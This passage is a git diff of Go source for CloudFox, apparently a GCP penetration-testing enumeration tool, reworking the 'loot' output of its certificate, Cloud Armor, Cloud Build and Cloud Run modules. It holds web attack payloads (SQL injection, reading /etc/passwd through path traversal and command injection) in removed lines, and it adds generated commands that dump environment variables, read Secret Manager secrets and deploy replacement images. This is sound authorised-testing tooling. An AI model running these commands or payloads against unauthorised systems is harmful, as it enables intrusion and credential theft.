m.LootMap["all-certificates"].Contents += fmt.Sprintf("## - %s\n", reason) - } - m.LootMap["all-certificates"].Contents += "\n" - - // Expiring certificates - if cert.DaysUntilExpiry <= 30 { - status := "EXPIRING" - if cert.DaysUntilExpiry < 0 { - status = "EXPIRED" - } - m.LootMap["expiring-certificates"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s\n"+ - "## Domains: %s\n"+ - "## Expires: %s (%d days)\n\n", - status, cert.Name, - cert.ProjectID, - strings.Join(cert.Domains, ", "), - cert.ExpireTime, cert.DaysUntilExpiry, - ) - } - - // Domains - for _, domain := range cert.Domains { - m.LootMap["certificate-domains"].Contents += domain + "\n" - } - - // Wildcard certificates - for _, domain := range cert.Domains { - if strings.HasPrefix(domain, "*") { - m.LootMap["wildcard-certificates"].Contents += fmt.Sprintf( - "## %s (Project: %s)\n"+ - "## Wildcard Domain: %s\n"+ - "## If the private key is compromised, an attacker can MITM any subdomain\n\n", - cert.Name, cert.ProjectID, domain, - ) - break - } - } } // ------------------------------ @@ -318,52 +261,62 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log var tables []internal.TableFile // Combined certificates table - header := []string{"Risk", "Name", "Type", "Domains", "Expires", "Days Left", "Project Name", "Project ID"} + header := []string{"Project Name", "Project ID", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} var body [][]string for _, cert := range m.Certificates { - domains := strings.Join(cert.Domains, ", ") - if len(domains) > 40 { - domains = domains[:37] + "..." + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" } - - daysLeft := fmt.Sprintf("%d", cert.DaysUntilExpiry) - if cert.DaysUntilExpiry < 0 { - daysLeft = "EXPIRED" + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" } body = append(body, []string{ - cert.RiskLevel, + m.GetProjectName(cert.ProjectID), + cert.ProjectID, cert.Name, cert.Type, - domains, + strings.Join(cert.Domains, ", "), cert.ExpireTime, - daysLeft, - m.GetProjectName(cert.ProjectID), - cert.ProjectID, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, }) } for _, cert := range m.SSLCertificates { - domains := strings.Join(cert.Domains, ", ") - if len(domains) > 40 { - domains = domains[:37] + "..." + wildcard := "No" + if cert.Wildcard { + wildcard = "Yes" } - - daysLeft := fmt.Sprintf("%d", cert.DaysUntilExpiry) - if cert.DaysUntilExpiry < 0 { - daysLeft = "EXPIRED" + expired := "No" + if cert.Expired { + expired = "Yes" + } + selfManaged := "No" + if cert.SelfManaged { + selfManaged = "Yes" } body = append(body, []string{ - cert.RiskLevel, + m.GetProjectName(cert.ProjectID), + cert.ProjectID, cert.Name, cert.Type, - domains, + strings.Join(cert.Domains, ", "), cert.ExpireTime, - daysLeft, - m.GetProjectName(cert.ProjectID), - cert.ProjectID, + fmt.Sprintf("%d", cert.DaysUntilExpiry), + wildcard, + expired, + selfManaged, }) } @@ -377,23 +330,17 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log // Certificate maps table if len(m.CertMaps) > 0 { - mapHeader := []string{"Risk", "Name", "Location", "Entries", "Certificates", "Project Name", "Project ID"} + mapHeader := []string{"Project Name", "Project ID", "Name", "Location", "Entries", "Certificates"} var mapBody [][]string for _, certMap := range m.CertMaps { - certs := strings.Join(certMap.Certificates, ", ") - if len(certs) > 40 { - certs = certs[:37] + "..." - } - mapBody = append(mapBody, []string{ - certMap.RiskLevel, + m.GetProjectName(certMap.ProjectID), + certMap.ProjectID, certMap.Name, certMap.Location, fmt.Sprintf("%d", certMap.EntryCount), - certs, - m.GetProjectName(certMap.ProjectID), - certMap.ProjectID, + strings.Join(certMap.Certificates, ", "), }) } diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go index 390afd76..455fd202 100644 --- a/gcp/commands/cloudarmor.go +++ b/gcp/commands/cloudarmor.go @@ -160,128 +160,85 @@ func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, // Loot File Management // ------------------------------ func (m *CloudArmorModule) initializeLootFiles() { - m.LootMap["security-policies"] = &internal.LootFile{ - Name: "security-policies", - Contents: "# Cloud Armor Security Policies\n# Generated by CloudFox\n\n", - } - m.LootMap["policy-weaknesses"] = &internal.LootFile{ - Name: "policy-weaknesses", - Contents: "# Cloud Armor Policy Weaknesses\n# Generated by CloudFox\n# These policies have misconfigurations that reduce their effectiveness\n\n", - } - m.LootMap["unprotected-lbs"] = &internal.LootFile{ - Name: "unprotected-lbs", - Contents: "# Load Balancers Without Cloud Armor Protection\n# Generated by CloudFox\n# These LBs have no WAF/DDoS protection\n\n", - } - m.LootMap["bypass-techniques"] = &internal.LootFile{ - Name: "bypass-techniques", - Contents: "# Cloud Armor Bypass Techniques\n# Generated by CloudFox\n# Based on policy analysis\n\n", + m.LootMap["cloudarmor-details"] = &internal.LootFile{ + Name: "cloudarmor-details", + Contents: "# Cloud Armor Details\n# Generated by CloudFox\n\n", } } func (m *CloudArmorModule) addPolicyToLoot(policy cloudarmorservice.SecurityPolicy) { - // All policies - m.LootMap["security-policies"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s | Type: %s\n"+ - "## Rules: %d | Adaptive Protection: %v\n"+ - "## Attached Resources: %s\n", - policy.RiskLevel, policy.Name, - policy.ProjectID, policy.Type, - policy.RuleCount, policy.AdaptiveProtection, - strings.Join(policy.AttachedResources, ", "), - ) - for _, reason := range policy.RiskReasons { - m.LootMap["security-policies"].Contents += fmt.Sprintf("## + %s\n", reason) + // Build flags for special attributes + var flags []string + if len(policy.Weaknesses) > 0 { + flags = append(flags, "HAS WEAKNESSES") } - for _, weakness := range policy.Weaknesses { - m.LootMap["security-policies"].Contents += fmt.Sprintf("## - WEAKNESS: %s\n", weakness) + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" } - m.LootMap["security-policies"].Contents += "\n" - // Policies with weaknesses - if len(policy.Weaknesses) > 0 { - m.LootMap["policy-weaknesses"].Contents += fmt.Sprintf( - "## [%s] %s (Project: %s)\n", - policy.RiskLevel, policy.Name, policy.ProjectID, - ) - for _, weakness := range policy.Weaknesses { - m.LootMap["policy-weaknesses"].Contents += fmt.Sprintf("## - %s\n", weakness) - } - m.LootMap["policy-weaknesses"].Contents += "\n" + adaptive := "No" + if policy.AdaptiveProtection { + adaptive = "Yes" } - // Generate bypass techniques based on weaknesses - if len(policy.Weaknesses) > 0 || len(policy.AttachedResources) > 0 { - m.LootMap["bypass-techniques"].Contents += fmt.Sprintf("## Policy: %s (Project: %s)\n", policy.Name, policy.ProjectID) + resources := "None" + if len(policy.AttachedResources) > 0 { + resources = strings.Join(policy.AttachedResources, ", ") + } - // Check for missing OWASP rules - hasOWASP := false - for _, rule := range policy.Rules { - if strings.Contains(strings.ToLower(rule.Match), "sqli") || - strings.Contains(strings.ToLower(rule.Match), "xss") { - hasOWASP = true - break - } - } + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + "# %s%s\n"+ + "Project: %s | Type: %s\n"+ + "Rules: %d | Adaptive Protection: %s\n"+ + "Attached Resources: %s\n", + policy.Name, flagStr, + policy.ProjectID, policy.Type, + policy.RuleCount, adaptive, + resources, + ) - if !hasOWASP { - m.LootMap["bypass-techniques"].Contents += - "## No OWASP rules detected - try common web attacks:\n" + - "# SQLi: ' OR '1'='1\n" + - "# XSS: \n" + - "# Path traversal: ../../../etc/passwd\n" + - "# Command injection: ; cat /etc/passwd\n\n" + // Add weaknesses if any + if len(policy.Weaknesses) > 0 { + m.LootMap["cloudarmor-details"].Contents += "Weaknesses:\n" + for _, weakness := range policy.Weaknesses { + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf(" - %s\n", weakness) } + } - // Check for preview-only rules - previewCount := 0 + // Add rules + if len(policy.Rules) > 0 { + m.LootMap["cloudarmor-details"].Contents += "Rules:\n" for _, rule := range policy.Rules { + preview := "" if rule.Preview { - previewCount++ + preview = " [PREVIEW]" } - } - if previewCount > 0 { - m.LootMap["bypass-techniques"].Contents += fmt.Sprintf( - "## %d rules in preview mode - attacks will be logged but NOT blocked\n\n", - previewCount, + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + " - Priority %d: %s%s\n"+ + " Match: %s\n", + rule.Priority, rule.Action, preview, + rule.Match, ) - } - - // Check for rate limiting - hasRateLimit := false - for _, rule := range policy.Rules { if rule.RateLimitConfig != nil { - hasRateLimit = true - m.LootMap["bypass-techniques"].Contents += fmt.Sprintf( - "## Rate limit detected: %d requests per %d seconds\n", + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + " Rate Limit: %d requests per %d seconds\n", rule.RateLimitConfig.ThresholdCount, rule.RateLimitConfig.IntervalSec, ) } } - if !hasRateLimit { - m.LootMap["bypass-techniques"].Contents += - "## No rate limiting - brute force attacks may succeed\n\n" - } - - m.LootMap["bypass-techniques"].Contents += "\n" } + + m.LootMap["cloudarmor-details"].Contents += "\n" } func (m *CloudArmorModule) addUnprotectedLBToLoot(projectID, lbName string) { - m.LootMap["unprotected-lbs"].Contents += fmt.Sprintf( - "## [MEDIUM] %s (Project: %s)\n"+ - "## This load balancer has no Cloud Armor security policy\n"+ - "## It is vulnerable to:\n"+ - "## - DDoS attacks\n"+ - "## - Web application attacks (SQLi, XSS, etc.)\n"+ - "## - Bot attacks\n"+ - "##\n"+ - "## To add protection:\n"+ - "gcloud compute backend-services update %s \\\n"+ - " --project=%s \\\n"+ - " --security-policy=YOUR_POLICY_NAME\n\n", - lbName, projectID, + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + "# %s [UNPROTECTED]\n"+ + "Project: %s\n"+ + "No Cloud Armor policy attached\n\n", lbName, projectID, ) } @@ -294,7 +251,7 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg // Security policies table if len(m.Policies) > 0 { - header := []string{"Risk", "Policy", "Type", "Rules", "Adaptive", "Resources", "Weaknesses", "Project Name", "Project"} + header := []string{"Project Name", "Project ID", "Name", "Type", "Rules", "Attached Resources", "Adaptive Protection"} var body [][]string for _, policy := range m.Policies { @@ -305,24 +262,17 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg resources := "-" if len(policy.AttachedResources) > 0 { - resources = fmt.Sprintf("%d", len(policy.AttachedResources)) - } - - weaknessCount := "-" - if len(policy.Weaknesses) > 0 { - weaknessCount = fmt.Sprintf("%d", len(policy.Weaknesses)) + resources = strings.Join(policy.AttachedResources, ", ") } body = append(body, []string{ - policy.RiskLevel, + m.GetProjectName(policy.ProjectID), + policy.ProjectID, policy.Name, policy.Type, fmt.Sprintf("%d", policy.RuleCount), - adaptive, resources, - weaknessCount, - m.GetProjectName(policy.ProjectID), - policy.ProjectID, + adaptive, }) } @@ -333,7 +283,7 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg }) } - // Unprotected LBs table + // Unprotected backend services table var unprotectedList []struct { ProjectID string LBName string @@ -348,21 +298,19 @@ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logg } if len(unprotectedList) > 0 { - header := []string{"Risk", "Load Balancer", "Project Name", "Project", "Issue"} + header := []string{"Project Name", "Project ID", "Backend Service"} var body [][]string for _, item := range unprotectedList { body = append(body, []string{ - "MEDIUM", - item.LBName, m.GetProjectName(item.ProjectID), item.ProjectID, - "No Cloud Armor policy attached", + item.LBName, }) } tables = append(tables, internal.TableFile{ - Name: "unprotected-load-balancers", + Name: "unprotected-backend-services", Header: header, Body: body, }) diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index c711bad4..daedbc48 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -140,115 +140,94 @@ func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, // Loot File Management // ------------------------------ func (m *CloudBuildModule) initializeLootFiles() { - m.LootMap["cloudbuild-triggers"] = &internal.LootFile{ - Name: "cloudbuild-triggers", - Contents: "# Cloud Build Triggers\n# Generated by CloudFox\n\n", + m.LootMap["cloudbuild-details"] = &internal.LootFile{ + Name: "cloudbuild-details", + Contents: "# Cloud Build Details\n# Generated by CloudFox\n\n", } - m.LootMap["cloudbuild-service-accounts"] = &internal.LootFile{ - Name: "cloudbuild-service-accounts", - Contents: "# Cloud Build Service Accounts\n# Generated by CloudFox\n\n", +} + +func (m *CloudBuildModule) addTriggerToLoot(trigger cloudbuildservice.TriggerInfo) { + // Build flags for special attributes + var flags []string + if trigger.PrivescPotential { + flags = append(flags, "PRIVESC POTENTIAL") } - // Pentest-focused loot files - m.LootMap["cloudbuild-privesc"] = &internal.LootFile{ - Name: "cloudbuild-privesc", - Contents: "# Cloud Build Privilege Escalation Opportunities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + if trigger.Disabled { + flags = append(flags, "DISABLED") } - m.LootMap["cloudbuild-exploitation"] = &internal.LootFile{ - Name: "cloudbuild-exploitation", - Contents: "# Cloud Build Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" } - m.LootMap["cloudbuild-secrets"] = &internal.LootFile{ - Name: "cloudbuild-secrets", - Contents: "# Cloud Build Secret References\n# Generated by CloudFox\n# Secrets used in builds (names only, not values)\n\n", + + sa := trigger.ServiceAccount + if sa == "" { + sa = "(default)" } - m.LootMap["cloudbuild-logs"] = &internal.LootFile{ - Name: "cloudbuild-logs", - Contents: "# Cloud Build Log Locations\n# Generated by CloudFox\n# Check logs for leaked secrets\n\n", + + branchTag := trigger.BranchName + if branchTag == "" { + branchTag = trigger.TagName } -} -func (m *CloudBuildModule) addTriggerToLoot(trigger cloudbuildservice.TriggerInfo) { - m.LootMap["cloudbuild-triggers"].Contents += fmt.Sprintf( - "# Trigger: %s (%s)\n"+ - "# Source: %s - %s\n"+ - "# Branch: %s\n"+ - "# Config: %s\n\n", - trigger.Name, - trigger.ID, - trigger.SourceType, - trigger.RepoName, - trigger.BranchName, - trigger.Filename, + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + "# %s (%s)%s\n"+ + "Project: %s\n"+ + "Source: %s - %s\n"+ + "Branch/Tag: %s | Config: %s\n"+ + "Service Account: %s\n", + trigger.Name, trigger.ID, flagStr, + trigger.ProjectID, + trigger.SourceType, trigger.RepoName, + branchTag, trigger.Filename, + sa, ) - - if trigger.ServiceAccount != "" { - m.LootMap["cloudbuild-service-accounts"].Contents += fmt.Sprintf( - "%s # Trigger: %s\n", - trigger.ServiceAccount, - trigger.Name, - ) - } } func (m *CloudBuildModule) addSecurityAnalysisToLoot(analysis cloudbuildservice.TriggerSecurityAnalysis) { - if analysis.PrivescPotential || analysis.RiskLevel == "HIGH" || analysis.RiskLevel == "MEDIUM" { - m.LootMap["cloudbuild-privesc"].Contents += fmt.Sprintf( - "## [%s] Trigger: %s\n"+ - "## Project: %s\n"+ - "## Service Account: %s\n"+ - "## Privesc Potential: %v\n", - analysis.RiskLevel, analysis.TriggerName, - analysis.ProjectID, - analysis.ServiceAccount, - analysis.PrivescPotential, - ) - if len(analysis.RiskReasons) > 0 { - m.LootMap["cloudbuild-privesc"].Contents += "## Risk Reasons:\n" - for _, reason := range analysis.RiskReasons { - m.LootMap["cloudbuild-privesc"].Contents += fmt.Sprintf("## - %s\n", reason) - } - } - m.LootMap["cloudbuild-privesc"].Contents += "\n" - } - - // Exploitation commands + // Add exploitation commands if available if len(analysis.ExploitCommands) > 0 { - m.LootMap["cloudbuild-exploitation"].Contents += fmt.Sprintf( - "## Trigger: %s (Project: %s)\n"+ - "## Risk: %s\n", - analysis.TriggerName, analysis.ProjectID, analysis.RiskLevel, - ) + m.LootMap["cloudbuild-details"].Contents += "Exploitation:\n" for _, cmd := range analysis.ExploitCommands { - m.LootMap["cloudbuild-exploitation"].Contents += cmd + "\n" + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(" %s\n", cmd) } - m.LootMap["cloudbuild-exploitation"].Contents += "\n" } + m.LootMap["cloudbuild-details"].Contents += "\n" } func (m *CloudBuildModule) addBuildToLoot(build cloudbuildservice.BuildInfo) { - // Log locations for potential secret leakage + buildID := build.ID + if len(buildID) > 12 { + buildID = buildID[:12] + } + + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + "# Build: %s\n"+ + "Project: %s | Status: %s\n"+ + "Trigger: %s | Source: %s\n", + buildID, + build.ProjectID, build.Status, + build.TriggerID, build.Source, + ) + + // Log location if build.LogsBucket != "" { - m.LootMap["cloudbuild-logs"].Contents += fmt.Sprintf( - "# Build: %s (Project: %s)\n"+ - "# Status: %s\n"+ - "gsutil cat %s/log-%s.txt\n\n", - build.ID[:12], build.ProjectID, build.Status, + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + "Logs: gsutil cat %s/log-%s.txt\n", build.LogsBucket, build.ID, ) } - // Track secrets used in builds + // Secret environment variables if len(build.SecretEnvVars) > 0 { - m.LootMap["cloudbuild-secrets"].Contents += fmt.Sprintf( - "## Build: %s (Project: %s)\n"+ - "## Secret Environment Variables:\n", - build.ID[:12], build.ProjectID, - ) + m.LootMap["cloudbuild-details"].Contents += "Secret Env Vars:\n" for _, secret := range build.SecretEnvVars { - m.LootMap["cloudbuild-secrets"].Contents += fmt.Sprintf("## - %s\n", secret) + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(" - %s\n", secret) } - m.LootMap["cloudbuild-secrets"].Contents += "\n" } + + m.LootMap["cloudbuild-details"].Contents += "\n" } // ------------------------------ @@ -257,6 +236,8 @@ func (m *CloudBuildModule) addBuildToLoot(build cloudbuildservice.BuildInfo) { func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logger) { // Triggers table triggersHeader := []string{ + "Project Name", + "Project ID", "Name", "Source", "Repository", @@ -264,17 +245,23 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg "Config File", "Service Account", "Disabled", - "Project Name", - "Project", + "Privesc Potential", } var triggersBody [][]string + privescCount := 0 for _, trigger := range m.Triggers { - disabled := "" + disabled := "No" if trigger.Disabled { disabled = "Yes" } + privesc := "No" + if trigger.PrivescPotential { + privesc = "Yes" + privescCount++ + } + branchTag := trigger.BranchName if branchTag == "" { branchTag = trigger.TagName @@ -286,6 +273,8 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg } triggersBody = append(triggersBody, []string{ + m.GetProjectName(trigger.ProjectID), + trigger.ProjectID, trigger.Name, trigger.SourceType, trigger.RepoName, @@ -293,32 +282,35 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg trigger.Filename, sa, disabled, - m.GetProjectName(trigger.ProjectID), - trigger.ProjectID, + privesc, }) } // Builds table buildsHeader := []string{ + "Project Name", + "Project ID", "ID", "Status", "Trigger", "Source", "Created", - "Project Name", - "Project", } var buildsBody [][]string for _, build := range m.Builds { + buildID := build.ID + if len(buildID) > 12 { + buildID = buildID[:12] + } buildsBody = append(buildsBody, []string{ - build.ID[:12], + m.GetProjectName(build.ProjectID), + build.ProjectID, + buildID, build.Status, build.TriggerID, build.Source, build.CreateTime, - m.GetProjectName(build.ProjectID), - build.ProjectID, }) } @@ -330,12 +322,14 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg } } - tables := []internal.TableFile{ - { + var tables []internal.TableFile + + if len(triggersBody) > 0 { + tables = append(tables, internal.TableFile{ Name: "cloudbuild-triggers", Header: triggersHeader, Body: triggersBody, - }, + }) } if len(buildsBody) > 0 { @@ -346,51 +340,8 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg }) } - // Security analysis table (pentest-focused) - securityHeader := []string{ - "Risk", - "Trigger", - "Service Account", - "Privesc", - "Reasons", - "Project Name", - "Project", - } - - var securityBody [][]string - privescCount := 0 - for _, analysis := range m.SecurityAnalysis { - privesc := "" - if analysis.PrivescPotential { - privesc = "Yes" - privescCount++ - } - - reasons := strings.Join(analysis.RiskReasons, "; ") - if len(reasons) > 50 { - reasons = reasons[:50] + "..." - } - - securityBody = append(securityBody, []string{ - analysis.RiskLevel, - analysis.TriggerName, - analysis.ServiceAccount, - privesc, - reasons, - m.GetProjectName(analysis.ProjectID), - analysis.ProjectID, - }) - } - - if len(securityBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "cloudbuild-security", - Header: securityHeader, - Body: securityBody, - }) - if privescCount > 0 { - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME) - } + if privescCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME) } output := CloudBuildOutput{ diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go index 9fe78fb7..737c7480 100644 --- a/gcp/commands/cloudrun.go +++ b/gcp/commands/cloudrun.go @@ -163,111 +163,140 @@ func (m *CloudRunModule) processProject(ctx context.Context, projectID string, l // Loot File Management // ------------------------------ func (m *CloudRunModule) initializeLootFiles() { - m.LootMap["cloudrun-gcloud-commands"] = &internal.LootFile{ - Name: "cloudrun-gcloud-commands", - Contents: "# Cloud Run gcloud Commands\n# Generated by CloudFox\n\n", + m.LootMap["cloudrun-commands"] = &internal.LootFile{ + Name: "cloudrun-commands", + Contents: "# Cloud Run Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } - m.LootMap["cloudrun-public-urls"] = &internal.LootFile{ - Name: "cloudrun-public-urls", - Contents: "# PUBLIC Cloud Run Service URLs\n# Generated by CloudFox\n# These services are publicly accessible!\n\n", + m.LootMap["cloudrun-env-vars"] = &internal.LootFile{ + Name: "cloudrun-env-vars", + Contents: "# Cloud Run Environment Variables\n# Generated by CloudFox\n\n", } - m.LootMap["cloudrun-exploitation"] = &internal.LootFile{ - Name: "cloudrun-exploitation", - Contents: "# Cloud Run Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["cloudrun-images"] = &internal.LootFile{ - Name: "cloudrun-images", - Contents: "# Cloud Run Container Images\n# Generated by CloudFox\n# Check these for vulnerabilities and secrets\n\n", + m.LootMap["cloudrun-secret-refs"] = &internal.LootFile{ + Name: "cloudrun-secret-refs", + Contents: "# Cloud Run Secret Manager References\n# Generated by CloudFox\n# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n", } } func (m *CloudRunModule) addServiceToLoot(svc CloudRunService.ServiceInfo) { - // gcloud commands - m.LootMap["cloudrun-gcloud-commands"].Contents += fmt.Sprintf( - "# Service: %s (Project: %s, Region: %s)\n"+ + // All commands for this service + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "## Service: %s (Project: %s, Region: %s)\n"+ + "# Image: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v\n"+ + "# URL: %s\n\n"+ + "# Describe service:\n"+ "gcloud run services describe %s --region=%s --project=%s\n"+ + "# Get IAM policy:\n"+ "gcloud run services get-iam-policy %s --region=%s --project=%s\n"+ - "gcloud run revisions list --service=%s --region=%s --project=%s\n\n", - svc.Name, svc.ProjectID, svc.Region, - svc.Name, svc.Region, svc.ProjectID, - svc.Name, svc.Region, svc.ProjectID, - svc.Name, svc.Region, svc.ProjectID, - ) - - // Container images - m.LootMap["cloudrun-images"].Contents += fmt.Sprintf( - "%s # %s (%s)\n", - svc.ContainerImage, svc.Name, svc.ProjectID, - ) - - // Public services - if svc.IsPublic && svc.URL != "" { - m.LootMap["cloudrun-public-urls"].Contents += fmt.Sprintf( - "# SERVICE: %s\n"+ - "# Project: %s, Region: %s\n"+ - "# Ingress: %s\n"+ - "# Service Account: %s\n"+ - "# URL:\n%s\n\n"+ - "# Test with:\ncurl -s %s\n\n", - svc.Name, - svc.ProjectID, svc.Region, - svc.IngressSettings, - svc.ServiceAccount, - svc.URL, - svc.URL, - ) - } - - // Exploitation commands - m.LootMap["cloudrun-exploitation"].Contents += fmt.Sprintf( - "# Service: %s (Project: %s, Region: %s)\n"+ - "# Service Account: %s\n"+ - "# Public: %v\n\n"+ + "# List revisions:\n"+ + "gcloud run revisions list --service=%s --region=%s --project=%s\n"+ "# Invoke the service (if you have run.routes.invoke):\n"+ - "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n\n"+ - "# Deploy malicious revision (if you have run.services.update):\n"+ - "gcloud run deploy %s --image=YOUR_IMAGE --region=%s --project=%s\n\n"+ + "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n"+ + "# Deploy revision (if you have run.services.update):\n"+ + "gcloud run deploy %s --image=YOUR_IMAGE --region=%s --project=%s\n"+ "# Read container logs (if you have logging.logEntries.list):\n"+ "gcloud logging read 'resource.type=\"cloud_run_revision\" resource.labels.service_name=\"%s\"' --project=%s --limit=50\n\n", svc.Name, svc.ProjectID, svc.Region, + svc.ContainerImage, svc.ServiceAccount, svc.IsPublic, svc.URL, svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.URL, + svc.Name, svc.Region, svc.ProjectID, svc.Name, svc.ProjectID, ) -} -func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { - // gcloud commands - m.LootMap["cloudrun-gcloud-commands"].Contents += fmt.Sprintf( - "# Job: %s (Project: %s, Region: %s)\n"+ - "gcloud run jobs describe %s --region=%s --project=%s\n"+ - "gcloud run jobs executions list --job=%s --region=%s --project=%s\n\n", - job.Name, job.ProjectID, job.Region, - job.Name, job.Region, job.ProjectID, - job.Name, job.Region, job.ProjectID, - ) + // Add environment variables to loot + if len(svc.EnvVars) > 0 { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + for _, env := range svc.EnvVars { + if env.Source == "direct" { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) + } else { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) + } + } + m.LootMap["cloudrun-env-vars"].Contents += "\n" + } - // Container images - m.LootMap["cloudrun-images"].Contents += fmt.Sprintf( - "%s # job: %s (%s)\n", - job.ContainerImage, job.Name, job.ProjectID, - ) + // Add secret references to loot + if len(svc.SecretRefs) > 0 { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + for _, ref := range svc.SecretRefs { + if ref.Type == "env" { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, svc.ProjectID, + ) + } else { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, svc.ProjectID, + ) + } + } + m.LootMap["cloudrun-secret-refs"].Contents += "\n" + } +} - // Exploitation commands - m.LootMap["cloudrun-exploitation"].Contents += fmt.Sprintf( - "# Job: %s (Project: %s, Region: %s)\n"+ +func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { + // All commands for this job + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Region: %s)\n"+ + "# Image: %s\n"+ "# Service Account: %s\n\n"+ + "# Describe job:\n"+ + "gcloud run jobs describe %s --region=%s --project=%s\n"+ + "# List executions:\n"+ + "gcloud run jobs executions list --job=%s --region=%s --project=%s\n"+ "# Execute the job (if you have run.jobs.run):\n"+ - "gcloud run jobs execute %s --region=%s --project=%s\n\n"+ + "gcloud run jobs execute %s --region=%s --project=%s\n"+ "# Update job image (if you have run.jobs.update):\n"+ "gcloud run jobs update %s --image=YOUR_IMAGE --region=%s --project=%s\n\n", job.Name, job.ProjectID, job.Region, + job.ContainerImage, job.ServiceAccount, job.Name, job.Region, job.ProjectID, job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, ) + + // Add environment variables to loot + if len(job.EnvVars) > 0 { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + for _, env := range job.EnvVars { + if env.Source == "direct" { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) + } else { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) + } + } + m.LootMap["cloudrun-env-vars"].Contents += "\n" + } + + // Add secret references to loot + if len(job.SecretRefs) > 0 { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + for _, ref := range job.SecretRefs { + if ref.Type == "env" { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, job.ProjectID, + ) + } else { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + 